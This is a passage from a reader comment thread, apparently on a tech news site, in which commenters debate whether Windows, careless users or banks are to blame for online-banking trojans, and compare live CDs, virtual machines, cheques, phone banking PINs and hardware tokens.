    "...country's overreliance on the technology of Microsoft, the U.S. software giant that owns the Korean computing experience like a fat kid does a cookie jar."

    I wonder how many other Korean computers enlisted the the latest bot army today?

  57. Paul 4

    Cheques...

    "Contrary to what banks say, writing checks really isn't that much of a hassle, at least if you don't write that many of them."

    Its not about the writing, its about the banks and the company your sending them to having hassle, and it is basic politeness in modern accounts to use BACS or CHAPS if you can, so that other people will do that for you. It may seem like big numbers, but to most medium to large accounts departments £250k is not a huge sum compaird to the cost of processing cheques.

    Cheques are a pain in the arse to process from an accounts recivable point of view.

  58. Isolated Penguin
    Linux

    For those of you who are blaming the users....

    Yes, user training is a problem especially with Windows based systems.

    But I find it interesting that when The Apple Mac had a much smaller share of the computing market, less than 2 percent, Mac OS up through OS9, had virus problems and virus scanners to deal with them. Since then Mac's market share has grown significantly, some say 5% Plus others put it higher. Yet Mac OSX has not seen a corresponding rise in virus problems. In fact they have pretty much disappeared. And Mac users are also considered to be some of the most "trusting" of any computer users, but they don't have the same virus problems and fears that are just a part of the Microsoft computing experience for users at all user levels of experience. They just get their work done.

    Then -- Less than 2% market share, Mac was worth attacking. Now -- More than 5% of a much larger computing market and no virus problems to speak of. Same Users. Even similar Intel based hardware. Hmmm could the OS architecture be a factor?

  59. Jeremy 8
    Coat

    Problem and solution...

    Problem: You want to use Linux or a live Linux CD but your bank only supports IE.

    Solution: Notify them of the problem. If they don't fix it, change banks.

  60. TrishaD

    @Adnim

    Congratulations - the first truly sensible post on this topic.

    It is of little value to castigate the end users, consider them 'unfit to use a PC', describe them as 'bozos' or whatever. The fact of the matter is that the internet in its current form only exists (and a large number of techies have jobs, including security pros like me) because the use of a PC to conduct business and pleasure is now a mass-market occupation and the mass users have the perfectly legitimate expectation of switching on their machines in the morning and just using them.

    Blaming 'the user' is futile and achieves nothing.

    So - is blaming the platform of any more value? I'm not a huge fan of Microsoft but after many years of indifference they appear to have finally started to get their act together and its self evident to me that just as Sun Solaris boxes sitting on corporate networks were the prime target in the late '90s, Windows is the prime target now and for the same reason - its the most widely used O/S and the focus of the bad guys' knowledge base.

    I think we need to come up with a new paradigm for end-user computing where the user doesnt buy a PC and a basic O/S complete with Admin access, but a pre-configured unit with everything locked down in advance. Back that up with recent proposals that ISPs take steps to isolate machines infected with botnet malware and we might start to get somewhere.

  61. This post has been deleted by its author

  62. Andy Watt
    Thumb Up

    Echo - windows legacy arch definitely a big problem here

    I'd go along with posts pointing out the structural flaws in the way windows is constructed -

    1. It's built to support a huge range of hardware: therefore the driver model is too open (and when MS attempts to close the model a bit, everybody moans about it and it slows machines to a crawl)

    2. As admitted by MS themselves, they never though windows would ever be connected to a world wide network of PCs - it simply wasn't secure from the ground up

    3. As mentioned above, the original single-user mode operation is still hamstringing attempts to squish security into the platform

    But in addition - and probably more importantly - the very fact that windows is /on/ 95% of the world's computers should be the very reason why those with a little knowledge shouldn't use windows for online banking. Those statistical reasons for making all the malware for windows (as well as the structural ones) mean we should keep schtum and do financially sensitive work in Linux, or OSX, or whatever - just not windows.

    So I think the thrust of the article is in fact totally correct, not "defeatist" or "negative". You can't argue with the plain truth that Windows has hundreds of thousands of pieces of malware trying to get in, and you need to be savvy enough to keep it clean (touch wood, I've never had any money stolen this way and I work on windows all the time).

    People aren't ever going to learn this habit (hell, most of them don't secure their wireless access points unless it's shipped to them that way), so the windows machine base will always be swarming with infection.

    Run away from the herd!

    Apart from anything, even when you DO know how fragile Windows is, who wants to spend all that damn TIME cleaning, disinfecting, updating, doing dull maintenance work when the PC is so bloody powerful it could do it all for you, and be more secure from the outset anyway?

    I've had enough of complex operating systems which are dragging around legacy issues - just got rid of my last symbian handset, and - you guessed it - got an iPhone. Locked down, yes. Some things dumbed down to hell in comparison - yes. But solid, safe (so far) and I have some confidence in its' long-term future.

    Good article, says I.

  63. Dom 3

    Free Clue Here.

    Stop blaming the users. Read the following, particularly any self-proclaimed experts. Some slides:

    http://www.cs.auckland.ac.nz/~pgut001/pubs/phishing.pdf

    http://www.cs.auckland.ac.nz/~pgut001/pubs/malware_biz.pdf

    A longer read:

    http://www.cs.auckland.ac.nz/~pgut001/pubs/usability.pdf

  64. Anonymous Coward
    Thumb Down

    I'd rather bank online than call the bank

    bank: "can I have your name, address, DOB, account details, last sexual experience, etc"

    me: "and who might you be?"

    bank: "someone with a fake name working in a call centre a thousand miles away from where you live, with no particular concern for your security or that of your bank, sir"

    *click*

  65. Anonymous Coward
    Troll

    Here's your car analogy.

    Car X is made of cardboard, sticky back plastic and bottle tops. There is a nice(ish) looking plastic body kit on top of that but it only gets updated once every 5 years or so, usually by working in some gimmick they stole off Car Z.

    Despite the flimsy lightweight nature of it, Car X requires a 6 litre engine in order to travel the same speed that Cars Y and Z can go using a 2 litre engine. In order to meet the needs of this 6 litre engine, a high capacity fuel tank must be added also. If the car hits any sort of obstacle it will disintegrate instantly.

    Car X is very uncomfortable when you first drive it. The air con, sun roof, windows, electric mirrors etc don't do anything until you find the right 3rd party software. And every piece of 3rd party software adds 3 seconds to the amount of time the engine needs to turn over when you first turn the key.

    You must install airbags yourself and check them EVERY DAY or you WILL die. Same goes for seat belts and head rests.

    If you drive Car X to the bank criminals will steal it and use it as their get away car, because the doors are made of plastic and can simply be pulled off. Any valuables you leave in the boot will be going with the criminals, along with the 600 brochures and catalogues for miscellaneous junk that the car came pre loaded with.

    Cars Y and Z are actually good.

    Which one do you want?

  66. Carter Cole
    Gates Halo

    everyone already saying it but i gotta chime in too

    windows is not the issue its dumb ass users yes trojans are nasty and they can even do tricky stuff like rewriting the banking webpage so you don't even see your funds are gone but if you use even a little common sense you wont get infected. when i get a virus (usually because i was slumming it on the nastier parts fo the internet looking for viruses) i wipe my computer. i don't log into online banking anywhere i make sure that i trust that the machine is not compromised and if i even start to suspect it i wont go to online banking. i mean its like saying use macs because they dont get viruses well now they are and while some other options may be less likely to get infected but if you are just safe in the first place you will never have an issue

  67. Anonymous Coward
    Troll

    oh and i forgot to say

    Car X's chassis was originally designed to be used for a motorbike, until MONOCORP realised people wanted cars and they tacked 2 extra wheels on the side. They've never stopped building cars that way.

  68. Anomalous Cowherd Silver badge

    Call the bank? More secure? Nope.

    Phone banking? More secure? You've got to be kidding

    I opened a new bank account with the Halifax this morning. To set up phone security I was asked to choose a 6 digit numeric pin, and told I would be asked for two numbers.

    How many people would choose a date?

    How many of those dates would have 0, 1 or 2 as the first letter and 0 as the third letter?

    How likely is it that I'd be given three tries to get it right?

    Banks: Don't ask for 6 digit pins, or if you do don't prompt for just two digits.

  69. Anonymous Coward
    Anonymous Coward

    Downloading files in unix/linux

    I'm not sure that I buy that users are less likely to fall for trojan attacks in in unix/linux based OSes because downloaded files can't be executed without additional steps after download. My reasoning is that if a user is prepared to run anything that they are told to by an email, they'll also be happy to fire off a chmod command (or however it's done through the gui) which an email would presumably instruct them to do.

    Also, if Vista is anything to go by, users will probably be happy to stick in their root password at the drop of a hat, without asking why, in fact they'll probably sudo any usefull commands so they don't even have to.

    This is clearly a user problem, until users are educated enough to not believe everything that their magic box tells them, it will continue to be a problem. Remember this: It's 60 years since the Orson Wells 'War of the Worlds' broadcast and many, many people still believe anything any form of technology tells them.

  70. Anonymous Coward
    FAIL

    Reading comprehension fail

    Y'all didn't read the guy's article, nor the comments, did you? What he suggested was a cheap ie "free" way for a lay person to get himself a secure terminal by using a Linux live-cd. He pointed out the advantages of a live-cd such as the fact of the read-only nature of its boot drive. I reckon that if MS or Apple would sell you a live-cd he probably would have reccommended that one, or at least mentioned it.

  71. Jimbob 3
    Boffin

    Virtual Machine all the way

    For the ultra security concious:

    Set up a Virtual XP Machine (Virtual PC/VMWare Server) for the sole purpose of online banking. Don't use it for anything else whatsoever and you WILL be malware and trojan free.

    Although, if you know how to do the above you probably know how to browse safely already. Hmmm

  72. Jimbob 3
    Flame

    *POSTING?!?!?*

    Rely on cheques? HaHaHaHaHaHaAAAAAAAAAAAHHHH! I am still waiting for a cheque I posted to a bank to arrive. I posted it on the 25th September. 20 days so far and no sign of it getting there. That is a joke.

    Shall we regress back to the caves with thinking like that?

  73. jg007
    Jobs Halo

    2 points about mac / linux users and not just 1

    1, as said they have less market share

    2, rarely said but very important - AT THE MOMENT most mac / linux people are more knowledgable and less likely to click things than windows users as they have to be to be or at least know somebody who is to change in the first place

    I have always used windows and internet explorer and have used online banking from the start and have never been hacked , the only time I got even a minor virus issue was when I was being impatient trying to find something and downloaded from somewhere not very safe and I immediately realised and then wiped the computer to make sure that I felt safe.

    Windows is not perfect but it is complicated and has a lot of legacy support so mistakes will happen and things will have to be patched, this patch tuesday is a good thing and not bad as at least it means that a whole load of issue have been patched.

    stupid or silly users will always manage to find ways to cause problems or get themselves hacked

  74. Anonymous Coward
    FAIL

    The problem is the user

    Ok so lets say theoritecally that users stopped using windows machines for online banking. Well seeing how Wndows has the biggest market and it is a super high chance that the banks themselves are using windows machines, then what say you? If the banks can seem to keep their windws machines uninfected then so can the home user. If they bothered to try. OS is not he problem Yes Windows may be full of holes and blah blah blah but all Im saying is if the Banks use Windows and money isn't being stollen then then home user should be able to as well.

  75. Joe Blogs

    LOL

    It's funny reading all these comments where people are blaming, the OS writers, the users or the banks. Maybe we should blame the people who write the malware?

    Just a thought...

    Have a nice day.

  76. elderlybloke
    Linux

    On Line Banking

    A co-operative bank i use , in addition to password has a little gizmo that has a 6 number displayed that changes every minute.

    It seems to be a very good extra security to my Joe 6 Pack knowledge.

    I understand my OS is safer to use than another more popular one.

This topic is closed for new posts.

Other stories you might like